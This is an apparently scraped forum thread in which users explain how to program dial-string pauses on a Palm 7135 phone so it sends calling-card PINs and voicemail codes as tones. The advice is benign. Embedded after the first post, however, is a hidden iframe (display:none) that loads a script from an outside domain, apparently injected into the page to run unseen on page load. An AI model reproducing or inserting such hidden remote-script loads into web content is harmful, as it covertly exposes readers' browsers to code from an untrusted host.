+ Reply to Thread

Thread: Sending tones?

Sending tones?

Hi guys! It's been almost a week and I have a few questions; first off, can a tell my 7135 to send a series of tones with the press of a button? My old V60 would allow my to dial my calling card # using speed dial, then when prompted, press a button and it would send my 10 digit PIN #. It was very handy. Anyone know if this is possible?

TIA<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

AJR
    I'm assuming that you have to dial an 800# first, then enter your pin number. If this is the case you can program an entry in your address book (and even add it to voice dial) to dial the 800#, add 2 commas (or however many you need), then add your pin. So for example, you would have it dial:

800-555-1212,,423475

I setup an entry in my address book called Voicemail, and set it to dial the following:

*86,,#0000#1

(the 0000 is your vm password), then added it to voice dial and just say "Voicemail". I don't have to open the flip until I want to save or delete a message.

If your calling card is done in a different way, post how it has to be done here and myself or someone will come up with something creative

Oh I see! It could be even easier! I simply set the pause (using commas) to coincide with the prompts and it automaticaly sends the tones! Right? This could work! Thanks for your prompt reply!

You could also use a hard pause using "%". That way you can control when the PIN is entered.

AJR
    Originally posted by KLiuLess
    You could also use a hard pause using "%". That way you can control when the PIN is entered.
    How do you control a hard pause? Please elaborate... knowledge is power!

Originally posted by AJR
    How do you control a hard pause? Please elaborate... knowledge is power!
    If you have a % in the dial string, when you dial the nunber (speed dial or from your address book), dialing will pause. The phone application will read "release pause?". Hit the OK button to release it, and it will dial the additional digits.

Alan

It works!! Thanks sooo much!:p

But all that works on my phone is the following:

and that's it for digits... You'd figure a Palm device could send a thousand tones but nope,,,,, only 26. My T-720 could send over 30...

What's with this???